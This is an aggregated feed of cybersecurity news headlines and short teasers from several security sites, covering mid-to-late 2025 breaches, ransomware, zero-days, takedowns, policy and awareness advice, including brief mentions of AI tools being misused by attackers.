Security firms say the flaw has been actively exploited for weeks, even as Fortinet quietly shipped fixes and CISA added the bug to its KEV catalog.

The post Fortinet Confirms Active Exploitation of Critical FortiWeb Vulnerability appeared first on SecurityWeek.

Read More
CYBERCOM 2.0: Pentagon Unveils Plan to Fix Cyber Talent Shortfalls

The goal is to produce a cyber force capable of defeating threats posed by major adversaries such as China.


Read More
Watch on Demand: CISO Forum 2025 Virtual Summit

The CISO Forum Virtual Summit brought together CISOs, researchers, and innovators to share practical insights and strategies.


Read More
In Other News: Deepwatch Layoffs, macOS Vulnerability, Amazon AI Bug Bounty

Other noteworthy stories that might have slipped under the radar: EchoGram attack undermines AI guardrails, Asahi brewer still crippled after ransomware attack, Sora 2 system prompt uncovered.


Read More
Checkout.com Discloses Data Breach After Extortion Attempt

The information was stolen from a legacy cloud file storage system, not from its payment processing platform.


Read More
Washington Post Says Nearly 10,000 Employees Impacted by Oracle Hack

The media company admitted that cybercriminals attempted to extort a payment after stealing personal information. 


Read More
Akira Ransomware Group Made $244 Million in Ransom Proceeds

Akira was seen exploiting SonicWall vulnerabilities and encrypting Nutanix Acropolis Hypervisor (AHV) VM disk files this year.


Read More
Amazon Detects 150,000 NPM Packages in Worm-Powered Campaign

A financially motivated threat actor automated the package publishing process in a coordinated tea.xyz token farming campaign.


Read More
Imunify360 Vulnerability Could Expose Millions of Sites to Hacking

A vulnerability in ImunifyAV can be exploited for arbitrary code execution by uploading a malicious file to shared servers.


Read More
Anthropic Says Claude AI Powered 90% of Chinese Espionage Campaign

A state-sponsored threat actor manipulated Claude Code to execute cyberattacks on roughly 30 organizations worldwide.


Read More
Fortinet finally cops to critical make-me-admin bug under active exploitation

More than a month after PoC made public

Fortinet finally published a security advisory on Friday for a critical FortiWeb path traversal vulnerability under active exploitation – but it appears digital intruders got a month's head start.…

Read More
Crims poison 150K+ npm packages with token-farming malware

Amazon spilled the TEA

Yet another supply chain attack has hit the npm registry in what Amazon describes as "one of the largest package flooding incidents in open source registry history" - but with a twist. Instead of injecting credential-stealing code or ransomware into the packages, this one is a token farming campaign.…

Read More
FBI flags scam targeting Chinese speakers with bogus surgery bills

Crooks spoof US insurers, threaten bogus extradition to pry loose personal data and cash

Chinese speakers in the US are being targeted as part of an aggressive health insurance scam campaign, the FBI warns.…

Read More
CISA flags imminent threat as Akira ransomware starts hitting Nutanix AHV

Advisory updated as leading cybercrime crew opens up its target pool

The US Cybersecurity and Infrastructure Security Agency (CISA) has issued new guidance to organizations on the Akira ransomware operation, which poses an imminent threat to critical sectors.…

Read More
Clop claims it hacked 'the NHS.' Which bit? Your guess is as good as theirs

Cybercrime crew has ravaged multiple private organizations using Oracle EBS zero-day for months

The UK's National Health Service (NHS) is investigating claims of a cyberattack by extortion crew Clop.…

Read More
Kubernetes overlords decide Ingress NGINX isn’t worth saving

Maintenance to end next year after ‘helpful options’ became ‘serious security flaws’

Kubernetes maintainers have decided it’s not worth trying to save Ingress NGINX and will instead stop work on the project and retire it in March 2026.…

Read More
Chinese spies told Claude to break into about 30 critical orgs. Some attacks succeeded

Anthropic dubs this the first AI-orchestrated cyber snooping campaign

Chinese cyber spies used Anthropic's Claude Code AI tool to attempt digital break-ins at about 30 high-profile companies and government organizations – and the government-backed snoops "succeeded in a small number of cases," according to a Thursday report from the AI company.…

Read More
Ransomed CTO falls on sword, refuses to pay extortion demand

Checkout.com will instead donate the amount to fund cybercrime research

Digital extortion is a huge business, because affected orgs keep forking over money to get their data back. However, instead of paying a ransom demand after getting hit by extortionists last week, payment services provider Checkout.com donated the demanded amount to fund cybercrime research.…

Read More
Ubuntu 25.10's Rusty sudo holes quickly welded shut

The goal of 'oxidizing' the Linux distro hits another bump

Two vulnerabilities in Ubuntu 25.10's new "sudo-rs" command have been found, disclosed, and fixed in short order.…

Read More
Extra, extra, read all about it: Washington Post clobbered in Clop caper

Nearly 10,000 staff and contractors warned after attackers raided newspaper's Oracle EBS setup

The Washington Post has confirmed that nearly 10,000 employees and contractors had sensitive personal data stolen in the Clop-linked Oracle E-Business Suite (EBS) attacks.…

Read More
Rhadamanthys malware admin rattled as cops seize a thousand-plus servers

Operation Endgame also takes down Elysium and VenomRAT infrastructure

International cops have pulled apart the Rhadamanthys infostealer operation, seizing 1,025 servers tied to the malware in coordinated raids between November 10-13.…

Read More
NHS supplier ends probe into ransomware attack that contributed to patient death

Synnovis's 18-month forensic review of Qilin intrusion completed, now affected patients to be notified

Synnovis has finally wrapped up its investigation into the 2024 ransomware attack that crippled pathology services across London, ending an 18-month effort to untangle what the NHS supplier describes as one of the most complex data reconstruction jobs it has ever faced.…

Read More
Google sues 25 China-based scammers behind Lighthouse 'phishing for dummies' kit

600+ phishing websites and 116 of these use a Google logo

Google has filed a lawsuit against 25 unnamed China-based scammers, which it claims have stolen more than 115 million credit card numbers in the US as part of the Lighthouse phishing operation.…

Read More
Attackers turned Citrix, Cisco 0-day exploits into custom-malware hellscape

Vendors (still) keep mum

An "advanced" attacker exploited CitrixBleed 2 and a max-severity Cisco Identity Services Engine (ISE) bug as zero-days to deploy custom malware, according to Amazon Chief Information Security Officer CJ Moses.…

Read More
Bitcoin bandit's £5B bubble bursts as cops wrap seven-year chase

Metropolitan Police lands lengthy sentence following 'complex' investigation

The Metropolitan Police's seven-year investigation into a record-setting fraudster has ended after she was sentenced to 11 years and eight months in prison on Tuesday.…

Read More
UK's Cyber Security and Resilience Bill makes Parliamentary debut

Various touch-ups added as MPs seek greater resilience to attacks on critical sectors

UK government introduced the Cyber Security and Resilience (CSR) Bill to Parliament today, marking a significant overhaul of local cybersecurity legislation to sharpen the security posture of the most critical sectors.…

Read More
Aviation watchdog says organized drone attacks will shut UK airports ‘sooner or later’

Skies are open for mischief as hard-to-trace drones and fast-moving cyber raids promise new wave of disruption

Britain's aviation watchdog has warned it's only a matter of time before organized drone attacks bring UK airports to a standstill.…

Read More
China hates crypto and scams, but is now outraged USA acquired bitcoin from a scammer

A new theory from the agency that brought us ‘America hacked itself to blame Beijing’

China’s National Computer Virus Emergency Response Center (CVERC) has alleged a nation-state entity, probably the USA, was behind a 2020 attack on a bitcoin mining operation and by doing so has gone into bat for entities that Beijing usually blasts.…

Read More
Australia’s spy boss says authoritarian nations ready to commit ‘high-impact sabotage’

‘Elite teams’ are pondering cyber-attacks to turn off energy supply or telecoms networks

The head of Australia’s Security Intelligence Organisation (ASIO) has warned that authoritarian regimes “are growing more willing to disrupt or destroy critical infrastructure”, using cyber-sabotage.…

Read More
North Korean spies turn Google's Find Hub into remote-wipe weapon

KONNI espionage crew covertly abused Google’s Find My Device feature to remotely factory-reset Android phones

North Korean state-backed spies have found a new way to torch evidence of their own cyber-spying – by hijacking Google's Find Hub service to remotely wipe Android phones belonging to their South Korean targets.…

Read More
EU's reforms of GDPR, AI slated by privacy activists for 'playing into Big Tech’s hands'

Lobbying efforts gain ground as proposals carve myriad holes into regulations

Privacy advocates are condemning the European Commission's leaked plans to overhaul digital privacy legislation, accusing officials of bypassing proper legislative processes to favor Big Tech interests.…

Read More
OWASP Top 10: Broken access control still tops app security list

Risk list highlights misconfigs, supply chain failures, and singles out prompt injection in AI apps

The Open Worldwide Application Security Project (OWASP) just published its top 10 categories of application risks for 2025, its first list since 2021. It found that while broken access control remains the top issue, security misconfiguration is a strong second, and software supply chain issues are still prominent.…

Read More
Hitachi-owned GlobalLogic admits data stolen on 10k current and former staff

Clop's Oracle EBS exploit spree shows no sign of slowing, claims nearly 30 more casualties in media, finance, and tech.

Digital engineering outfit GlobalLogic says personal data from more than 10,000 current and former employees was exposed in the wave of Oracle E-Business Suite (EBS) attacks attributed to the Clop ransomware gang. The Hitachi-owned biz joins a growing roster of high-profile victims that also now includes The Washington Post and Allianz UK.…

Read More
UK asks cyberspies to probe whether Chinese buses can be switched off remotely

Norwegian testers claim maker has remote access, while UK importer says supplier complies with the law

The UK government is working with the National Cyber Security Centre to understand and "mitigate" any risk that China-made imported electric buses could be remotely accessed and potentially disabled.…

Cyber insurers paid out over twice as much for UK ransomware attacks last year

Massive increase in policy claims… and data doesn’t even cover the major attacks of 2025

The number of successful cyber insurance claims made by UK organizations shot up last year, according to the latest figures from the industry's trade association.…

UK's Ajax fighting vehicle arrives – years late and still sending crew to hospital

Continuous track of long-awaited AFV hits the ground ... and the terrain is pretty bumpy

The British Army just received its first new armored fighting vehicle (AFV) for nearly three decades, but it is years late, hit by rising costs, is still reportedly injuring its crew, and there are questions about whether it remains relevant in the age of drone warfare. …

LLM side-channel attack could allow snoops to guess what you're talking about

Encryption protects content, not context

Updated: Mischief-makers can guess the subjects being discussed with LLMs using a side-channel attack, according to Microsoft researchers. They told The Register that models from some providers, including Anthropic, AWS, DeepSeek, and Google, haven't been fixed, putting both personal users and enterprise communications at risk.…

Critical federal cybersecurity funding set to resume as government shutdown draws to a close - for now

Resolution acquiesced to by 8 Dems includes CISA Act funding, layoff reversals, and could be easily undone

The US Senate voted on Sunday to advance a short-term funding bill for the federal government, moving the country closer to ending its longest-ever shutdown. Part of the spending bill also restores critical cybersecurity programs that lapsed as the shutdown began. …

Phishers try to lure 5K Facebook advertisers with fake business pages

One company alone was hit with more than 4,200 emails

More than 5,000 businesses that use Facebook for advertising were bombarded by tens of thousands of phishing emails in a credential- and data-stealing campaign.…

Russian broker pleads guilty to profiting from Yanluowang ransomware attacks

Aleksei Volkov faces years in prison, may have been working with other crews

A Russian national will likely face several years in US prison after pleading guilty to a range of offenses related to his work with ransomware crews.…

Allianz UK joins growing list of Clop’s Oracle E-Business Suite victims

Insurance giant’s UK arm says cybercriminals misattributed the real victim

Allianz UK confirms it was one of the many companies that fell victim to the Clop gang's Oracle E-Business Suite (EBS) attack after crims reported that they had attacked a subsidiary.…

As AI enables bad actors, how are 3,000+ teams responding?

Breaking down trends in exposure management with insights from 3,000+ organizations and Intruder's security experts

Partner Content: This year has shown just how quickly new exposures can emerge, with AI-generated code shipped before review, cloud sprawl racing ahead of controls, and shadow IT opening blind spots. Supply chain compromises have disrupted transport, manufacturing, and other critical services. On the attacker side, AI-assisted exploit development is making it faster than ever to turn those weaknesses into working attacks.…

Cisco creating new security model using 30 years of data describing cyber-dramas and saves

Doubles parameters to over 17 billion, to detect threats and recommend actions

Exclusive: Cisco is working on a new AI model that will more than double the number of parameters used to train its current flagship Foundation-Sec-8B.…

Microsoft teases agents that become ‘independent users within the workforce’

Licensing expert worries they’ll be out of control on day one

Microsoft has teased what it’s calling “a new class” of AI agents “that operate as independent users within the enterprise workforce.”…

Data breach at Chinese infosec firm reveals cyber-weapons and target list

PLUS: India’s tech services exports growing fast; South Korea puts the bite on TXT spam; NTT gets into autonomous vehicles; and more!

Asia In Brief: Chinese infosec blog MXRN last week reported a data breach at a security company called Knownsec that has ties to Beijing and China's military.…

Louvre's pathetic passwords belong in a museum, just not that one

PLUS: CISA layoffs continue; Lawmakers criticize camera security; China to execute scammers; And more

Infosec in brief: There's no indication that the brazen bandits who stole jewels from the Louvre attacked the famed French museum's systems, but had they tried, it would have been incredibly easy.…

Who's watching the watchers? This Mozilla fellow, and her Surveillance Watch map

Esra'a Al Shafei spoke with The Reg about the spy tech 'global trade'

Interview: Digital rights activist Esra'a Al Shafei found FinFisher spyware on her device more than a decade ago. Now she's made it her mission to surveil the companies providing surveillanceware, their customers, and their funders.…

Previously unknown Landfall spyware used in 0-day attacks on Samsung phones

'Precision espionage campaign' began months before the flaw was fixed

A previously unknown Android spyware family called LANDFALL exploited a zero-day in Samsung Galaxy devices for nearly a year, installing surveillance code capable of recording calls, tracking locations, and harvesting photos and logs before Samsung finally patched it in April.…

Cybercrims plant destructive time bomb malware in industrial .NET extensions

Multi-year wait for destruction comes to an end for mystery attackers

Security experts have helped remove malicious NuGet packages planted in 2023 that were designed to destroy systems years in advance, with some payloads not due to hit until the latter part of this decade.…

Microsoft's data sovereignty: Now with extra sovereignty!

Under shadow of US CLOUD Act, Redmond releases raft of services to calm customers in the EU

Microsoft is again banging the data sovereignty drum in Europe, months after admitting in a French court it couldn't guarantee that data will not be transmitted to the US government when it is legally required to do so.…

Bank of England says JLR's cyberattack contributed to UK's unexpectedly slower GDP growth

This kind of material economic impact from online crooks thought to be a UK-first

The Bank of England (BoE) has cited the cyberattack on Jaguar Land Rover (JLR) as one of the reasons for the country's slower-than-expected GDP growth in its latest rates decision.…

How TeamViewer builds enterprise trust through security-first design

What to do when even your espresso machine needs end-to-end encryption

Sponsored Feature: The security landscape is getting more perilous day by day, as both nation-state groups and financially-motivated hackers ramp up their activity.…

Gootloader malware back for the attack, serves up ransomware

Move fast - miscreants compromised a domain controller in 17 hours

Gootloader JavaScript malware, commonly used to deliver ransomware, is back in action after a period of reduced activity.…

Cisco warns of 'new attack variant' battering firewalls under exploit for 6 months

Plus 2 new critical vulns - patch now

Cisco warned customers about another wave of attacks against its firewalls, which have been battered by intruders for at least six months. It also patched two critical bugs in its Unified Contact Center Express (UCCX) software that aren't under active exploitation - yet.…

You'll never guess what the most common passwords are. Oh, wait, yes you will

Most of you still can't do better than 123456?

123456. admin. password. For years, the IT world has been reminding users not to rely on such predictable passwords. And yet here we are with another study finding that those sorts of quickly-guessable, universally-held-to-be-bad passwords are still the most popular ones.…

SonicWall fingers state-backed cyber crew for September firewall breach

Spies, not crooks, were behind digital heist – damage stopped at the backups, says US cybersec biz

SonicWall has blamed an unnamed, state-sponsored collective for the September break-in that saw cybercriminals rifle through a cache of firewall configuration backups.…

Malware-pwned laptop gifts cybercriminals Nikkei's Slack

Stolen creds let miscreants waltz into 17K employees' chats, spilling info on staff and partners

Japanese media behemoth Nikkei has admitted to a data breach after miscreants slipped into its internal Slack workspace, exposing the personal details of more than 17,000 employees and business partners.…

Why UK businesses are paying ICO millions for password mistakes you're probably making right now

Strongly-worded emails to staff telling them to be more careful aren't going to cut it anymore

Partner Content: UK GDPR Article 32 mandates "appropriate security measures". The ICO has defined what that means: multi-million-pound fines for password failures. The violations that trigger them? Small, familiar, and happening in your organization right now.…

Uncle Sam lets Google take Wiz for $32B

Second time's the charm after Wiz rejected Google's $23B offer last year

Google's second attempt to acquire cloud security firm Wiz is going a lot better than the first, with the Department of Justice clearing the $32 billion deal, which ranks as Google's largest-ever acquisition.…

AMD red-faced over random-number bug that kills cryptographic security

Local privileges required to exploit flaw in Ryzen and Epyc CPUs. Some patches available, more on the way

AMD will issue a microcode patch for a high-severity vulnerability that could weaken cryptographic keys across Epyc and Ryzen CPUs.…

Chinese Hackers Automate Cyber-Attacks With AI-Powered Claude Code

Anthropic’s Claude Code AI assistant performed 80% to 90% of the tasks involved in a recent cyber-attack campaign, said Anthropic researchers

Akira Ransomware Haul Surpasses $244M in Illicit Proceeds

Akira ransomware has extorted $244M since September 2025, with some attacks exfiltrating data in just two hours, a joint cybersecurity advisory warns

Google Files Lawsuit to Dismantle 'Lighthouse' Smishing Kit

Google filed a civil lawsuit against 25 individuals accused of ties to a Chinese cyber collective known as the ‘Smishing Triad’

“IndonesianFoods” npm Worm Publishes 44,000 Malicious Packages

A new npm worm dubbed “IndonesianFoods” has doubled the number of known malicious packages

CISO Pay Increases 7% As Budget Growth Slows

An IANS study finds CISO compensation rose 6.7% on average in 2025 while budget growth halved compared to 2024

Operation Endgame 3.0 Dismantles Three Major Malware Networks

A global law enforcement operation has taken down the Rhadamanthys infostealer, VenomRAT trojan and the Elysium botnet

Improve Collaboration to Hit Back At Rising Fraud, Says techUK

Industry body techUK calls for real-time intelligence sharing across sectors to combat fraud

Synnovis Finally Issues Breach Notification After 2024 Ransomware Attack

NHS provider Synnovis is notifying clients about the extent of a data breach 17 months after it suffered a ransomware attack

GlobalLogic Becomes Latest Cl0p Victim After Oracle EBS Attack

GlobalLogic has notified 10,000 employees their data was stolen in the Oracle EBS campaign

Cyber-Insurance Payouts Soar 230% in UK

UK cyber-insurers paid 230% more to policyholders in 2024 than the year before

Microsoft Fixes Windows Kernel Zero Day in November Patch Tuesday

Microsoft has patched a zero-day vulnerability in the Windows Kernel under active exploitation by threat actors

UK Government Finally Introduces Cyber Security and Resilience Bill

The UK government is overhauling cybersecurity laws for the first time since 2018 with the Cyber Security and Resilience Bill

Week in review: Windows kernel flaw patched, suspected Fortinet FortiWeb zero-day exploited

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Adopting a counterintelligence mindset in luxury logistics In this Help Net Security interview, Andrea Succi, Group CISO at Ferrari Group, discusses how cybersecurity is integrated into every aspect of the logistics industry. He explains why protecting data can be as critical as securing physical assets and how a layered defense approach helps safeguard both. Succi adds that awareness, collaboration, and … More

The post Week in review: Windows kernel flaw patched, suspected Fortinet FortiWeb zero-day exploited appeared first on Help Net Security.

Chinese cyber spies used Claude AI to automate 90% of their attack campaign, Anthropic claims

Anthropic threat researchers believe that they’ve uncovered and disrupted the first documented case of a cyberattack executed with the help of its agentic AI and minimal human intervention. “The threat actor manipulated [Anthropic’s large language model] Claude into functioning as an autonomous cyber attack agent performing cyber intrusion operations rather than merely providing advice to human operators,” the company noted. “Analysis of operational tempo, request volumes, and activity patterns confirms the AI executed approximately 80 … More

A suspected Fortinet FortiWeb zero-day is actively exploited, researchers warn

A suspected (but currently unidentified) zero-day vulnerability in Fortinet FortiWeb is being exploited by unauthenticated attackers to create new admin accounts on vulnerable, internet-facing devices. Whether intentionally or accidentally, the vulnerability (or this specific path for triggering it) has been addressed in the latest FortiWeb version (8.0.2), Rapid7 researchers confirmed. Exploitation in the wild: exploitation attempts were first observed at the beginning of October by threat intelligence company Defused, after one of their honeypots had … More

Trulioo helps enterprises accelerate business onboarding

Trulioo announced Trulioo credit decisioning, a new capability that delivers comprehensive financial, credit and risk insights through the Trulioo global identity platform. The launch follows a 102% year-over-year increase in U.S. Know Your Business (KYB) transaction growth, underscoring the company’s innovation and leadership in global business onboarding. As regulatory pressure intensifies and fraud grows more sophisticated, financial signals and creditworthiness have become a critical factor in determining risk. Trulioo credit decisioning drives smarter evaluation, routing … More

Why your security strategy is failing before it even starts

In this Help Net Security interview, Adnan Ahmed, CISO at Ornua, discusses how organizations can build a cybersecurity strategy that aligns with business goals. He explains why many companies stumble by focusing on technology before understanding risk and shares how embedding cybersecurity across the business helps build resilience. Ahmed also outlines how a mature roadmap should integrate zero trust principles, operational resilience, and a security culture across both IT and OT environments. When you think … More

Protecting mobile privacy in real time with predictive adversarial defense

Mobile sensors are everywhere, quietly recording how users move, tilt, or hold their phones. The same data that powers step counters and activity trackers can also expose personal details such as gender, age, or even identity. A new study introduces a method designed to stop that information from being inferred in the first place, without interrupting the phone’s normal functions. (Figure: Overview of the PATN framework.) The system includes PATN training, where the network learns to … More

Los Alamos researchers warn AI may upend national security

For decades, the United States has built its defense posture around predictable timelines for technological progress. That assumption no longer holds, according to researchers at Los Alamos National Laboratory. Their paper argues that AI is advancing so quickly that the current defense system cannot adapt in time. The authors warn that the United States risks strategic surprise if it continues to rely on programs designed in an era before capable machine intelligence. They compare the … More

What happens when employees take control of AI

Executives may debate AI strategy, but many of the advances are happening at the employee level. A recent Moveworks study shows that AI adoption is being led from the ground up, with employees, not senior leaders, driving the change. The research found that large companies are seeing non-technical employees lead AI projects once limited to IT teams. This shift is changing how technology spreads, how decisions are made, and who shapes the next phase of … More

New infosec products of the week: November 14, 2025

Here’s a look at the most interesting products from the past week, featuring releases from Action1, Avast, Cyware, Firewalla, and Nokod Security. Action1 addresses Intune gaps with patching and risk-based vulnerability prioritization: Action1 announced new integrations that extend Microsoft Intune with advanced patching and vulnerability management. The enhancements close security and compliance gaps in Intune by adding comprehensive third-party application patching, risk-based vulnerability prioritization, and real-time visibility across Windows, macOS, and Linux. Avast delivers AI-powered … More

Fake spam filter alerts are hitting inboxes

A new phishing campaign is attempting to trick users into believing they’ve missed important emails, security researchers are warning. The emails: The bogus email alerts look like they are coming from the recipient’s email domain, and falsely claim that due to a “Secure Message system” upgrade, important messages have been blocked. To “release” (view) the emails, recipients are instructed to click on the “Move To Inbox” button/link and, if they do, they are taken to … More

How password managers can be hacked – and how to stay safe

Look no further to learn how cybercriminals could try to crack your vault and how you can keep your logins safe

Why shadow AI could be your biggest security blind spot

From unintentional data leakage to buggy code, here’s why you should care about unsanctioned AI use in your company

In memoriam: David Harley

Former colleagues and friends remember the cybersecurity researcher, author, and mentor whose work bridged the human and technical sides of security

The who, where, and how of APT attacks in Q2 2025–Q3 2025

ESET Chief Security Evangelist Tony Anscombe highlights some of the key findings from the latest issue of the ESET APT Activity Report

ESET APT Activity Report Q2 2025–Q3 2025

An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q2 2025 and Q3 2025

Sharing is scaring: The WhatsApp screen-sharing scam you didn’t see coming

How a fast-growing scam is tricking WhatsApp users into revealing their most sensitive financial and other data

How social engineering works | Unlocked 403 cybersecurity podcast (S2E6)

Think you could never fall for an online scam? Think again. Here's how scammers could exploit psychology to deceive you – and what you can do to stay one step ahead

Ground zero: 5 things to do after discovering a cyberattack

When every minute counts, preparation and precision can mean the difference between disruption and disaster

This month in security with Tony Anscombe – October 2025 edition

From the end of Windows 10 support to scams on TikTok and state-aligned hackers wielding AI, October's headlines offer a glimpse of what's shaping cybersecurity right now

Fraud prevention: How to help older family members avoid scams

Families that combine open communication with effective behavioral and technical safeguards can cut the risk dramatically

Cybersecurity Awareness Month 2025: When seeing isn't believing

Deepfakes are blurring the line between real and fake and fraudsters are cashing in, using synthetic media for all manner of scams

Recruitment red flags: Can you spot a spy posing as a job seeker?

Here’s what to know about a recent spin on an insider threat – fake North Korean IT workers infiltrating western firms

How MDR can give MSPs the edge in a competitive market

With cybersecurity talent in short supply and threats evolving fast, managed detection and response is emerging as a strategic necessity for MSPs

Cybersecurity Awareness Month 2025: Cyber-risk thrives in the shadows

Shadow IT leaves organizations exposed to cyberattacks and raises the risk of data loss and compliance failures

Gotta fly: Lazarus targets the UAV sector

ESET research analyzes a recent instance of the Operation DreamJob cyberespionage campaign conducted by Lazarus, a North Korea-aligned APT group

SnakeStealer: How it preys on personal data – and how you can protect yourself

Here’s what to know about the malware with an insatiable appetite for valuable data, so much so that it tops this year's infostealer detection charts

Cybersecurity Awareness Month 2025: Building resilience against ransomware

Ransomware rages on and no organization is too small to be targeted by cyber-extortionists. How can your business protect itself against the threat?

Minecraft mods: Should you 'hack' your game?

Some Minecraft mods don’t help build worlds – they break them. Here’s how malware can masquerade as a Minecraft mod.

IT service desks: The security blind spot that may put your business at risk

Could a simple call to the helpdesk enable threat actors to bypass your security controls? Here’s how your team can close a growing security gap.

Cybersecurity Awareness Month 2025: Why software patching matters more than ever

As the number of software vulnerabilities continues to increase, delaying or skipping security updates could cost your business dearly.

AI-aided malvertising: Exploiting a chatbot to spread scams

Cybercriminals have tricked X’s AI chatbot into promoting phishing scams in a technique that has been nicknamed “Grokking”. Here’s what to know about it.

How Uber seems to know where you are – even with restricted location permissions

Is the ride-hailing app secretly tracking you? Not really, but this iOS feature may make it feel that way.

Cybersecurity Awareness Month 2025: Passwords alone are not enough

Never rely on just a password, however strong it may be. Multi-factor authentication is essential for anyone who wants to protect their online accounts from intruders.

The case for cybersecurity: Why successful businesses are built on protection

Company leaders need to recognize the gravity of cyber risk, turn awareness into action, and put security front and center

Beware of threats lurking in booby-trapped PDF files

Looks can be deceiving, so much so that the familiar icon could mask malware designed to steal your data and money.

Manufacturing under fire: Strengthening cyber-defenses amid surging threats

Manufacturers operate in one of the most unforgiving threat environments and face a unique set of pressures that make attacks particularly damaging

New spyware campaigns target privacy-conscious Android users in the UAE

ESET researchers have discovered campaigns distributing spyware disguised as Android Signal and ToTok apps, targeting users in the United Arab Emirates

Cybersecurity Awareness Month 2025: Knowledge is power

We're kicking off the month with a focus on the human element: the first line of defense, but also the path of least resistance for many cybercriminals

This month in security with Tony Anscombe – September 2025 edition

The past 30 days have seen no shortage of new threats and incidents that brought into sharp relief the need for well-thought-out cyber-resilience plans

Roblox executors: It’s all fun and games until someone gets hacked

You could be getting more than you bargained for when you download that cheat tool promising quick wins

DeceptiveDevelopment: From primitive crypto theft to sophisticated AI-based deception

Malware operators collaborate with covert North Korean IT workers, posing a threat to both headhunters and job seekers

Watch out for SVG files booby-trapped with malware

What you see is not always what you get as cybercriminals increasingly weaponize SVG files as delivery vectors for stealthy malware

Gamaredon X Turla collab

Notorious APT group Turla collaborates with Gamaredon, both FSB-associated groups, to compromise high‑profile targets in Ukraine

Small businesses, big targets: Protecting your business against ransomware

Long known to be a sweet spot for cybercriminals, small businesses are more likely to be victimized by ransomware than large enterprises

Read More
HybridPetya: The Petya/NotPetya copycat comes with a twist

HybridPetya is the fourth publicly known real or proof-of-concept bootkit with UEFI Secure Boot bypass functionality

Read More
Introducing HybridPetya: Petya/NotPetya copycat with UEFI Secure Boot bypass

UEFI copycat of Petya/NotPetya exploiting CVE-2024-7344 discovered on VirusTotal

Read More
Are cybercriminals hacking your systems – or just logging in?

As bad actors often simply waltz through companies’ digital front doors with a key, here’s how to keep your own door locked tight

Read More
Preventing business disruption and building cyber-resilience with MDR

Given the serious financial and reputational risks of incidents that grind business to a halt, organizations need to prioritize a prevention-first cybersecurity strategy

Read More
Under lock and key: Safeguarding business data with encryption

As the attack surface expands and the threat landscape grows more complex, it’s time to consider whether your data protection strategy is fit for purpose

Read More
GhostRedirector poisons Windows servers: Backdoors with a side of Potatoes

ESET researchers have identified a new threat actor targeting Windows servers with a passive C++ backdoor and a malicious IIS module that manipulates Google search results

Read More
This month in security with Tony Anscombe – August 2025 edition

From Meta shutting down millions of WhatsApp accounts linked to scam centers all the way to attacks at water facilities in Europe, August 2025 saw no shortage of impactful cybersecurity news

Read More
Don’t let “back to school” become “back to (cyber)bullying”

Cyberbullying is a fact of life in our digital-centric society, but there are ways to push back

Read More
First known AI-powered ransomware uncovered by ESET Research

The discovery of PromptLock shows how malicious use of AI models could supercharge ransomware and other threats

Read More
"What happens online stays online" and other cyberbullying myths, debunked

Separating truth from fiction is the first step towards making better parenting decisions. Let’s puncture some of the most common misconceptions about online harassment.

Read More
The need for speed: Why organizations are turning to rapid, trustworthy MDR

How top-tier managed detection and response (MDR) can help organizations stay ahead of increasingly agile and determined adversaries

Read More
Investors beware: AI-powered financial scams swamp social media

Can you tell the difference between legitimate marketing and deepfake scam ads? It’s not always as easy as you may think.

Read More
Supply-chain dependencies: Check your resilience blind spot

Does your business truly understand its dependencies, and how to mitigate the risks posed by an attack on them?

Read More
How the always-on generation can level up its cybersecurity game

Digital natives are comfortable with technology, but may be more exposed to online scams and other threats than they think

Read More
WinRAR zero-day exploited in espionage attacks against high-value targets

The attacks used spearphishing campaigns to target financial, manufacturing, defense, and logistics companies in Europe and Canada, ESET research finds

Read More
Update WinRAR tools now: RomCom and others exploiting zero-day vulnerability

ESET Research discovered a zero-day vulnerability in WinRAR being exploited in the wild in the guise of job application documents; the weaponized archives exploited a path traversal flaw to compromise their targets

Read More
Black Hat USA 2025: Is a high cyber insurance premium about your risk, or your insurer’s?

A sky-high premium may not always reflect your company’s security posture

Read More
Android adware: What is it, and how do I get it off my device?

Is your phone suddenly flooded with aggressive ads, slowing down performance or leading to unusual app behavior? Here’s what to do.

Read More
Black Hat USA 2025: Policy compliance and the myth of the silver bullet

Who’s to blame when the AI tool managing a company’s compliance status gets it wrong?

Read More
Black Hat USA 2025: Does successful cybersecurity today increase cyber-risk tomorrow?

Success in cybersecurity is when nothing happens, plus other standout themes from two of the event’s keynotes

Read More
ESET Threat Report H1 2025: ClickFix, infostealer disruptions, and ransomware deathmatch

Threat actors are embracing ClickFix, ransomware gangs are turning on each other – toppling even the leaders – and law enforcement is disrupting one infostealer after another

Read More
Is your phone spying on you? | Unlocked 403 cybersecurity podcast (S2E5)

Here's what you need to know about the inner workings of modern spyware and how to stay away from apps that know too much

Read More
Why the tech industry needs to stand firm on preserving end-to-end encryption

Restricting end-to-end encryption on a single-country basis would not only be absurdly difficult to enforce, but it would also fail to deter criminal activity

Read More
This month in security with Tony Anscombe – July 2025 edition

Here's a look at cybersecurity stories that moved the needle, raised the alarm, or offered vital lessons in July 2025

Read More
The hidden risks of browser extensions – and how to stay safe

Not all browser add-ons are handy helpers – some may contain far more than you have bargained for

Read More
SharePoint under fire: ToolShell attacks hit organizations worldwide

The ToolShell bugs are being exploited by cybercriminals and APT groups alike, with the US on the receiving end of 13 percent of all attacks

Read More
ToolShell: An all-you-can-eat buffet for threat actors

ESET Research has been monitoring attacks involving the recently discovered ToolShell zero-day vulnerabilities

Read More
Rogue CAPTCHAs: Look out for phony verification pages spreading malware

Before rushing to prove that you're not a robot, be wary of deceptive human verification pages as an increasingly popular vector for delivering malware

Read More
Why is your data worth so much? | Unlocked 403 cybersecurity podcast (S2E4)

Behind every free online service, there's a price being paid. Learn why your digital footprint is so valuable, and when you might actually be the product.

Read More
Unmasking AsyncRAT: Navigating the labyrinth of forks

ESET researchers map out the labyrinthine relationships among the vast hierarchy of AsyncRAT variants

Read More
How to get into cybersecurity | Unlocked 403 cybersecurity podcast (S2E3)

Cracking the code of a successful cybersecurity career starts here. Hear from ESET's Robert Lipovsky as he reveals how to break into and thrive in this fast-paced field.

Read More
Task scams: Why you should never pay to get paid

Some schemes might sound unbelievable, but they’re easier to fall for than you think. Here’s how to avoid getting played by gamified job scams.

Read More
How government cyber cuts will affect you and your business

Deep cuts in cybersecurity spending risk creating ripple effects that will put many organizations at a higher risk of falling victim to cyberattacks

Read More
Gamaredon in 2024: Cranking out spearphishing campaigns against Ukraine with an evolved toolset

ESET Research analyzes Gamaredon’s updated cyberespionage toolset, new stealth-focused techniques, and aggressive spearphishing operations observed throughout 2024

Read More
ESET Threat Report H1 2025: Key findings

ESET Chief Security Evangelist Tony Anscombe looks at some of the report's standout findings and their implications for organizations in 2025

Read More
